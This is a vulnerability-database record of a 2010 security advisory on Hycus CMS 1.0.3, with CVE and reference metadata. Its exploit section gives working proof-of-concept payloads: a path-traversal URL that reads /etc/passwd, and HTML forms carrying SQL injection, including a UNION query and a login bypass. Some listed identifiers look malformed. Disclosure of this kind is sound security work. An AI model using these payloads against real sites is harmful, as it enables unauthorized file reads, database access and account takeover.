ID

VAR-E-201012-0374


CVE

cve_id:CVE-2010-4612

Trust: 1.9

cve_id:CVE-2010-4613

Trust: 1.3

sources: BID: 45527 // EXPLOIT-DB: 15797 // EDBNET: 38624

EDB ID

15797


TITLE

Hycus CMS - Multiple Vulnerabilities - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 15797

DESCRIPTION

Hycus CMS - Multiple Vulnerabilities. CVE-2010-4613, CVE-2010-4612, CVE-70218, CVE-70217, CVE-70148, CVE-70147, CVE-70146, CVE-70145. webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 15797

AFFECTED PRODUCTS

vendor: hycus, model: cms, scope: -, version: -

Trust: 1.6

vendor: hycus, model: cms, scope: eq, version: 1.0.3

Trust: 0.3

sources: BID: 45527 // EXPLOIT-DB: 15797 // EDBNET: 38624

EXPLOIT

Vulnerability ID: HTB22737
Reference: http://www.htbridge.ch/advisory/lfi_in_hycus_cms.html
Product: Hycus CMS
Vendor: Hycus Web Development Team ( http://www.hycus.com/ )
Vulnerable Version: 1.0.3
Vendor Notification: 07 December 2010
Vulnerability Type: LFI
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" and "admin.php" scripts to properly sanitize user-supplied input in the "site" variable.

The following PoC is available:

http://[host]/index.php?site=../../../../../../../etc/passwd%00
http://[host]/admin.php?site=../../../../../../../etc/passwd%00

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in the "useremail" variable.
An attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:

<form action="http://[host]/?user/1/forgotpass.html" method="post" name="main" >
<input type="hidden" name="useremail" value="1'SQL_CODE"/>
<input type="submit" value="submit" name="submit" />
</form>

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in the "q" variable.
An attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:

<form action="http://[host]/?search/1.html" method="post" name="main" >
<input type="hidden" name="q" value="search' union select 1,2,@@version -- 3"/>
<input type="submit" value="submit" name="submit" />
</form>

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in the "user_name" and "usr_email" variables.
An attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:

<form action="http://[host]/?user/1/hregister.html" method="post" name="main" >
<input type="hidden" name="full_name" value="username"/>
<input type="hidden" name="user_name" value="1'SQL_CODE"/>
<input type="hidden" name="usr_email" value="test@mail.com'SQL_CODE"/>
<input type="hidden" name="pwd" value="123456"/>
<input type="hidden" name="pwd2" value="123456"/>
<input type="submit" value="submit" name="submit" />
</form>

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in the "usr_email" variable.
An attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:

<form action="http://[host]/?user/1/hlogin.html" method="post" name="main" >
<input type="hidden" name="usr_email" value="1' OR 1=1 -- 1"/>
<input type="hidden" name="pwd" value="any"/>
<input type="submit" value="submit" name="submit" />
</form>

Trust: 1.0

sources: EXPLOIT-DB: 15797

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 15797

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 15797

TYPE

Multiple Vulnerabilities

Trust: 1.6

sources: EXPLOIT-DB: 15797 // EDBNET: 38624

CREDITS

High-Tech Bridge SA

Trust: 0.6

sources: EXPLOIT-DB: 15797

EXTERNAL IDS

db: NVD, id: CVE-2010-4612

Trust: 1.9

db: EXPLOIT-DB, id: 15797

Trust: 1.6

db: NVD, id: CVE-2010-4613

Trust: 1.3

db: EDBNET, id: 38624

Trust: 0.6

db: BID, id: 45527

Trust: 0.3

sources: BID: 45527 // EXPLOIT-DB: 15797 // EDBNET: 38624

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2010-4612

Trust: 1.6

url:http://www.htbridge.ch/advisory/lfi_in_hycus_cms.html

Trust: 1.3

url:https://nvd.nist.gov/vuln/detail/cve-2010-4613

Trust: 1.0

url:https://www.exploit-db.com/exploits/15797/

Trust: 0.6

url:http://www.hycus.com/

Trust: 0.3

sources: BID: 45527 // EXPLOIT-DB: 15797 // EDBNET: 38624

SOURCES

db: BID, id: 45527
db: EXPLOIT-DB, id: 15797
db: EDBNET, id: 38624

LAST UPDATE DATE

2022-07-27T10:03:38.479000+00:00


SOURCES UPDATE DATE

db: BID, id: 45527, date: 2015-04-13T21:02:00

SOURCES RELEASE DATE

db: BID, id: 45527, date: 2010-12-21T00:00:00
db: EXPLOIT-DB, id: 15797, date: 2010-12-21T00:00:00
db: EDBNET, id: 38624, date: 2010-12-21T00:00:00